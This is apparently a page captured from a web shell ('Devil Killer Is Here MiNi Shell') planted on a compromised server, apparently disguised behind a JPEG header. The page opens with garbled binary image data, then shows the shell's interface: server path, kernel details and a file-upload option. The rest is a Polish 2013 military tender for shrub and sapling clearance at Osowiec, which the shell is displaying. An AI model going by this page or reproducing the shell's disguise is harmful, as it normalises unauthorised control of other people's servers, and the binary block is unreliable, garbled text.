JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131010/210899-N-2013.html

<p class="kh_header"><b>Białystok: ZAGOSPODAROWANIE TERENU
(WYCINKA SAMOSIEJ I ZAKRZEWIEŃ -  OSOWIEC TWIERDZA)</b><br>
<b>Numer ogłoszenia: 210899 - 2013; data zamieszczenia: 10.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 25 Wojskowy Oddział Gospodarczy w Białymstoku , ul. Kawaleryjska 70, 15-601 Białystok, woj. podlaskie, tel. 85 749 88 13, faks 85 749 88 36.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojsko.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAGOSPODAROWANIE TERENU
(WYCINKA SAMOSIEJ I ZAKRZEWIEŃ -  OSOWIEC TWIERDZA).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w prowadzonym postępowaniu jest :
Część nr 1 Wycinka samosiej i zakrzaczeń w JW. 4226 Skład  Osowiec   Dział 21 na powierzchni 14,7 ha i Dział 29 na powierzchni 6,9 ha  teren zabytkowy.
1. Wymagania ogólne:1.1 Przedmiot zamówienia obejmuje wycinkę zakrzewień i samosiejek w zakresie wydanych decyzji administracyjnych na terenie kompleksu wojskowego użytkowanego przez JW. 4226, zgodnie z Mapą Gospodarczą Nadleśnictwa Knyszyn Dział 21 o powierzchni 14,7 ha, w skład którego wchodzą:
wydzielenie a o powierzchni 1,5 ha, wydzielenie c o powierzchni 9,2 ha, wydzielenie d o powierzchni 4,0 ha
Dział 29 o powierzchni 6,9 ha, w skład którego wchodzą: wydzielenie a o powierzchni 1,6 ha, wydzielenie l o powierzchni 2,4 ha, wydzielenie i o powierzchni 2,9 ha
Łączna powierzchnia wycinki wynosi 21,6 ha 
1.2 Wycince podlegają skupiska krzewów i samosiewów o średnicy przy ziemi powyżej 90 cm i sąsiadujące kępy o zwarciu uniemożliwiającym swobodne poruszanie się.
1.3 Przedstawiciel Zamawiającego w porozumieniu z przedstawicielem  Nadleśnictwa Knyszyn wskaże Wykonawcy teren wycinki. 
1.4 Wysokość wycinki maksymalnie do 5 cm powyżej gruntu.
1.5 Wycince nie podlega gatunek jałowiec pospolity oraz drzewa powyżej 10 lat.
1.6 Należy pozostawić min. 30% istniejącego w danym wydzieleniu leśnym podszytu.
1.7Wycięte samosiewy, poddać rozdrobnieniu poprzez zrębkowanie i rozplantowanie w miejscu wykonania pracy warstwą nie grubszą niż 10 cm, przy zachowaniu przepisów ppoż. Wykonawca ponosi koszty zrębkowania urobku po wycince drzew i rozplantowania w miejscu wykonywania usługi
1.8 Wykonawca usługi przed przystąpieniem do realizacji zadania skontaktuje się                         z Zastępcą Dowódcy JW 3248 (tel. 519 039 059) w celu dokonania szczegółowych uzgodnień.
1.9 Wycinkę należy prowadzić w ścisłym porozumieniu z przedstawicielem Nadleśnictwa Knyszyn i przedstawicielem JW 3248 Dęblin, który jest  odpowiedzialny za oczyszczanie terenu z materiałów wybuchowych. Uwagi i propozycje w zakresie wycinki, zgłoszone przez przedstawiciela JW 3248 Dęblin, należy niezwłocznie realizować.  
1.10 Wykonawca zobowiązany jest wykonać usługę z należytą starannością, fachowo i terminowo w dni robocze, w godzinach pracy 25 WOG, tj. poniedziałek do                         czwartek od 7.00 do 15.00, piątek od 7.00 do 13.00.
1.11 Wykonawca jest odpowiedzialny za jakość wykonania usługi, zgodnie                           z niniejszym opisem oraz jest zobowiązany do zachowania porządku na placu robót oraz jego właściwego oznakowania i zabezpieczenia.
1.12 Wycinkę należy przeprowadzić poza okresem lęgowym ptaków tj. od                            15 września. Zamówienie należy zrealizować do 02.12.2013r.
1.13 Wycinkę samosiej i zakrzaczeń należy wykonać zgodnie z art. 83 Ustawy o ochronie przyrody z dnia 16 kwietnia 2004 r. Dz. U. z 2001 r. nr 62 poz. 627 z późniejszymi zmianami.
1.14 Usunięcia drzew i samosiewów drzew i krzewów  może dokonać  tyko  uprawniony specjalista przy zachowaniu bezpieczeństwa ludzi i mienia.  
1.15 Wykonawca, zobowiązany jest do wykonywania prac zgodnie z przepisami bhp                      i ppoż. i ponosi pełna odpowiedzialność w tym zakresie. 
1.16 Wykonawca zobowiązany jest stosować się  do obowiązujących standardów i zasad organizacyjno porządkowych oraz stosować się do przepisów o ochronie informacji niejawnych.  
1.17 Wykonawca zobowiązuje się do zachowania porządku na placu robót oraz ich właściwego oznakowania i zabezpieczenia terenu.
1.18 Wycinkę należy wykonać w taki sposób, aby nie uszkadzać drzew i krzewów przewidzianych do zachowania.
1.19 W przypadku uszkodzenia infrastruktury technicznej  obiektów budowlanych, dróg a także wyrządzeniu szkody osobom trzecim oraz w mieniu osób trzecich                            Wykonawca zobowiązany jest do naprawienia powstałych szkód i doprowadzenia do stanu pierwotnego na własny koszt.
1.20 Jeżeli Wykonawca będzie realizował zamówienie w sposób wadliwy albo sprzeczny z umową,  Zamawiający ma prawo wezwać go do usunięcia wad lub zmiany sposobu wykonania i wyznaczyć mu w tym celu odpowiedni termin, potwierdzając ten fakt na piśmie.
1.21 Wykonawca oświadcza że przy wykonaniu przedmiotu zamówienia informacje dotyczące działalności użytkowników obiektów i urządzeń nie będą przetwarzane powielane i przekazywane instytucjom lub osobom fizycznym pod rygorem negatywnych skutków prawnych.  
1.22 Po rozstrzygnięciu przetargu, najpóźniej w dniu podpisania umowy wyłoniony Wykonawca zobowiązany jest do podania wykazu osób realizujących przedmiot zamówienia (imię, nazwisko, adres i nr PESEL) i pojazdów, (marka, typ, nr rejestracyjny) pod groźbą niewpuszczenia na teren jednostek z winy Wykonawcy. 
1.23 Wykonawca ponosi wyłączną odpowiedzialność za przeszkolenie zatrudnionych osób w zakresie przepisów BHP.
1.24 Wartość realizacji przedmiotu zamówienia będzie obejmowała wszystkie koszty wykonania przedmiotowej usługi łącznie z kosztami osobowymi Wykonawcy, kosztami dojazdu, kosztami wywozu   itp. 
Wykonawca zgłosi pisemnie  gotowość do odbioru usługi. 
2. Kontrola jakości wykonania usługi.
Kontrola wykonania usługi polega na: sprawdzeniu zgodności usuniętych krzewów i samosiej z opisem przedmiotu zamówienia, dokonaniu oględzin terenu w miejscach wycinki, czy nie powstały uszkodzenia w istniejących elementach zagospodarowania terenu lub drzew i krzewów przeznaczonych do zachowania, sprawdzenie porządku w miejscu prowadzonych wycinek, sprawdzenie zgodności zagospodarowania powstałych zrębków (rozplantowanie w miejscu wykonania pracy warstwą nie grubszą niż 10 cm),
3. Podstawa rozliczenia usługi. Rozliczenie usługi będzie dokonane jednorazowo po wykonaniu pełnego zakresu usługi i po końcowym odbiorze przez komisję złożoną z przedstawicieli Zamawiającego, Wykonawcy i Użytkownika. W/w komisja sporządza Protokół odbioru usługi, który zatwierdza Kierownik Infrastruktury. Na podstawie zatwierdzonego protokołu Wykonawca wystawi fakturę za wykonaną usługę. Wynagrodzenie będzie płatne w terminie 30 od daty otrzymania przez Zamawiającego prawidłowo wystawionej faktury VAT.
4. Zainteresowany zamówieniem wykonawca po pobraniu SIWZ, a przed złożeniem oferty będzie miał możliwość zapoznania się z warunkami realizacji zamówienia. Zamawiający przewiduje możliwość dokonania wizji lokalnej miejsca realizacji usług w terenie. Wykonawca zobowiązany jest do wcześniejszego uzgodnienia terminu wizji lokalnej z Kierownikiem Sekcji Ochrony Środowiska p. Elżbietą FRĄC, tel.  85 749 88 16. Wizję lokalną ustala się na dzień: 14.10.2013 r., godz. 12:00.
5. Podwykonawstwo 
Zamawiający dopuszcza powierzenie zamówienia podwykonawcom oraz żąda wskazania przez Wykonawcę w ofercie części zamówienia, którą powierzy podwykonawcom, zgodnie z art. 36 ust. 4 i 5 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tj. Dz. U. z 2010 nr 113 poz. 759 z późn. zm.).
Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. W umowie zawartej pomiędzy Zamawiającym a Wykonawcą, wskazane w ofercie części zamówienia, które wykonawca powierzy podwykonawcy, zostaną doprecyzowane. Wymaga się przed podpisaniem umowy, wskazania szczegółowego zakresu prac, które będzie realizował podwykonawca, nazwę podmiotu, adres i inne szczegóły pozwalające zidentyfikować podmiot. Do zawarcia przez wykonawcę umowy z podwykonawcą jest wymagana zgoda Zamawiającego. Jeżeli Zamawiający, w terminie 14 dni od przedstawienia mu przez wykonawcę umowy z podwykonawcą lub jej projektu, wraz z częścią dokumentacji dotyczącą wykonania robót określonych w umowie lub projekcie, nie zgłosi na piśmie sprzeciwu lub zastrzeżeń, uważa się, że wyraził zgodę na zawarcie umowy. Zamawiający nie wyraża zgody na zawarcie umowy podwykonawcy z dalszym podwykonawcą.
6. Wykonawca przyjmuje do wiadomości iż, teren będący obszarem zamówienia jest terenem niebezpiecznym, na którym istnieje możliwość wystąpienia niewybuchów, niewypałów i innych przedmiotów niebezpiecznych, w związku z tym należy zachować szczególną ostrożność podczas wykonywania przedmiotu zamówienia.
Część nr 2  Wycinka samosiej i zakrzaczeń  w JW 4226 Skład  Osowiec Dział 36 na powierzchni 16,6 ha, teren zabytkowy.
1. Wymagania ogólne:
1.1 Przedmiot zamówienia obejmuje wycinkę zakrzewień i samosiejek w zakresie wydanych decyzji administracyjnych na terenie kompleksu wojskowego użytkowanego przez JW 4226, zgodnie z Mapą Gospodarczą Nadleśnictwa Knyszyn Dział 36 o powierzchni 16,6 ha, w skład którego wchodzą: wydzielenie a o powierzchni 4,9 ha, wydzielenie b o powierzchni 4,4 ha, wydzielenie h o powierzchni 2,8 ha, wydzielenie k o powierzchni 4,5 ha
Łączna powierzchnia wycinki wynosi 16,6 ha 
1.2 Wycince podlegają skupiska krzewów i samosiewów o średnicy przy ziemi powyżej 90 cm i sąsiadujące kępy o zwarciu uniemożliwiającym swobodne poruszanie się.
1.3 Przedstawiciel Zamawiającego w porozumieniu z przedstawicielem  Nadleśnictwa Knyszyn wskaże Wykonawcy teren wycinki. 
1.4 Wysokość wycinki, maksymalnie do 5 cm powyżej gruntu.
1.5 Wycince nie podlega gatunek jałowiec pospolity oraz drzewa powyżej 10 lat.
1.6 Należy pozostawić min. 30% istniejącego w danym wydzieleniu leśnym podszytu.
1.7 Wycięte samosiewy, poddać rozdrobnieniu poprzez zrębkowanie i rozplantowanie w miejscu wykonania pracy warstwą nie grubszą niż 10 cm, przy zachowaniu przepisów ppoż. Wykonawca ponosi koszty zrębkowania urobku po wycince drzew i rozplantowania w miejscu wykonywania usługi
1.8 Wykonawca usługi przed przystąpieniem do realizacji zadania skontaktuje się                       z Zastępcą Dowódcy JW 3248 (tel.519 039 059) w celu dokonania szczegółowych uzgodnień.
1.9 Wycinkę należy prowadzić w ścisłym porozumieniu z przedstawicielem Nadleśnictwa Knyszyn i przedstawicielem JW 3248 Dęblin, który jest  odpowiedzialny za oczyszczanie terenu z materiałów wybuchowych. Uwagi i propozycje w zakresie wycinki, zgłoszone przez przedstawiciela JW 3248 Dęblin, należy niezwłocznie realizować.  
1.10 Wykonawca zobowiązany jest wykonać usługę z należytą starannością, fachowo i terminowo w dni robocze, w godzinach pracy 25 WOG, tj. poniedziałek                   do czwartek od 7.00 do 15.00, piątek od 7.00 do 13.00.
1.11 Wykonawca jest odpowiedzialny za jakość wykonania usługi, zgodnie                            z niniejszym opisem oraz jest zobowiązany do zachowania porządku na placu robót oraz jego właściwego oznakowania i zabezpieczenia.
1.12 Wycinkę należy przeprowadzić poza okresem lęgowym ptaków tj. od 15 września. Zamówienie należy zrealizować do 02.12.2013r.
1.13 Wycinkę samosiej i zakrzaczeń należy wykonać zgodnie z art. 83 Ustawy o ochronie przyrody z dnia 16 kwietnia 2004 r. Dz. U. z 2001 r. nr 62 poz. 627 z późniejszymi zmianami.
1.14 Usunięcia drzew i samosiewów drzew i krzewów  może dokonać tyko  uprawniony specjalista przy zachowaniu bezpieczeństwa ludzi i mienia.  
Wykonawca, zobowiązany jest do wykonywania prac zgodnie z przepisami bhp                       i ppoż. i ponosi pełna odpowiedzialność w tym zakresie. 
1.15 Wykonawca zobowiązany jest stosować się  do obowiązujących standardów i zasad organizacyjno porządkowych oraz stosować się do przepisów o ochronie informacji niejawnych.  
1.16 Wykonawca zobowiązuje się do zachowania porządku na placu robót oraz ich właściwego oznakowania i zabezpieczenia terenu.
1.17 Wycinkę należy wykonać w taki sposób, aby nie uszkadzać drzew i krzewów przewidzianych do zachowania.
1.18 W przypadku uszkodzenia infrastruktury technicznej  obiektów budowlanych, dróg a także wyrządzeniu szkody osobom trzecim oraz w mieniu osób trzecich                                 Wykonawca zobowiązany jest do naprawienia powstałych szkód i doprowadzenia do stanu pierwotnego na własny koszt.
1.19 Jeżeli Wykonawca będzie realizował zamówienie w sposób wadliwy albo sprzeczny z umową,  Zamawiający ma prawo wezwać go do usunięcia wad lub zmiany sposobu wykonania i wyznaczyć mu w tym celu odpowiedni termin, potwierdzając ten fakt na piśmie.
1.20 Wykonawca oświadcza że przy wykonaniu przedmiotu zamówienia informacje dotyczące działalności użytkowników obiektów i urządzeń nie będą przetwarzane powielane i przekazywane instytucjom lub osobom fizycznym pod rygorem negatywnych skutków prawnych.  
1.21 Po rozstrzygnięciu przetargu, najpóźniej w dniu podpisania umowy wyłoniony Wykonawca zobowiązany jest do podania wykazu osób realizujących przedmiot zamówienia (imię, nazwisko, adres i nr PESEL) i pojazdów, (marka, typ, nr rejestracyjny) pod groźbą niewpuszczenia na teren jednostek z winy Wykonawcy. 
1.22 Wykonawca ponosi wyłączną odpowiedzialność za przeszkolenie zatrudnionych osób w zakresie przepisów BHP.
1.23 Wartość realizacji przedmiotu zamówienia będzie obejmowała wszystkie koszty wykonania przedmiotowej usługi łącznie z kosztami osobowymi Wykonawcy, kosztami dojazdu, kosztami wywozu itp. 
Wykonawca zgłosi pisemnie  gotowość do odbioru usługi. 
2. Kontrola jakości wykonania usługi.
Kontrola wykonania usługi polega na: sprawdzeniu zgodności usuniętych krzewów i samosiej z opisem przedmiotu zamówienia, dokonaniu oględzin terenu w miejscach wycinki, czy nie powstały uszkodzenia w istniejących elementach zagospodarowania terenu lub drzew i krzewów przeznaczonych do zachowania, sprawdzenie porządku w miejscu prowadzonych wycinek, sprawdzenie zgodności zagospodarowania powstałych zrębków (rozplantowanie w miejscu wykonania pracy warstwą nie grubszą niż 10 cm),
3. Podstawa rozliczenia usługi.
Rozliczenie usługi będzie dokonane jednorazowo po wykonaniu pełnego zakresu usługi i po końcowym odbiorze przez komisję złożoną z przedstawicieli Zamawiającego, Wykonawcy i Użytkownika. W/w komisja sporządza Protokół odbioru usługi, który zatwierdza Kierownik Infrastruktury. Na podstawie zatwierdzonego protokołu Wykonawca wystawi fakturę za wykonaną usługę. Wynagrodzenie będzie płatne w terminie 30 od daty otrzymania przez Zamawiającego prawidłowo wystawionej faktury VAT.
4. Zainteresowany zamówieniem wykonawca po pobraniu SIWZ, a przed złożeniem oferty będzie miał możliwość zapoznania się z warunkami realizacji zamówienia. Zamawiający przewiduje możliwość dokonania wizji lokalnej miejsca realizacji usług w terenie. Wykonawca zobowiązany jest do wcześniejszego uzgodnienia terminu wizji lokalnej z Kierownikiem Sekcji Ochrony Środowiska p. Elżbietą FRĄC, tel.  85 749 88 16. Wizję lokalną ustala się na dzień: 14.10.2013 r., godz. 12:00.
5. Podwykonawstwo 
Zamawiający dopuszcza powierzenie zamówienia podwykonawcom oraz żąda wskazania przez Wykonawcę w ofercie części zamówienia, którą powierzy podwykonawcom, zgodnie z art. 36 ust. 4 i 5 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tj. Dz.U. z 2010 nr 113 poz. 759 z późn. zm.).
Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. W umowie zawartej pomiędzy Zamawiającym a Wykonawcą, wskazane w ofercie części zamówienia, które wykonawca powierzy podwykonawcy, zostaną doprecyzowane. Wymaga się przed podpisaniem umowy, wskazania szczegółowego zakresu prac, które będzie realizował podwykonawca, nazwę podmiotu, adres i inne szczegóły pozwalające zidentyfikować podmiot. Do zawarcia przez wykonawcę umowy z podwykonawcą jest wymagana zgoda Zamawiającego. Jeżeli Zamawiający, w terminie 14 dni od przedstawienia mu przez wykonawcę umowy z podwykonawcą lub jej projektu, wraz z częścią dokumentacji dotyczącą wykonania robót określonych w umowie lub projekcie, nie zgłosi na piśmie sprzeciwu lub zastrzeżeń, uważa się, że wyraził zgodę na zawarcie umowy. Zamawiający nie wyraża zgody na zawarcie umowy podwykonawcy z dalszym podwykonawcą.
6. Wykonawca przyjmuje do wiadomości iż, teren będący obszarem zamówienia jest terenem niebezpiecznym, na którym istnieje możliwość wystąpienia niewybuchów, niewypałów i innych przedmiotów niebezpiecznych, w związku z tym należy zachować szczególną ostrożność podczas wykonywania przedmiotu zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 02.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy                 o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy                 o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy                 o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy                 o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy                 o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
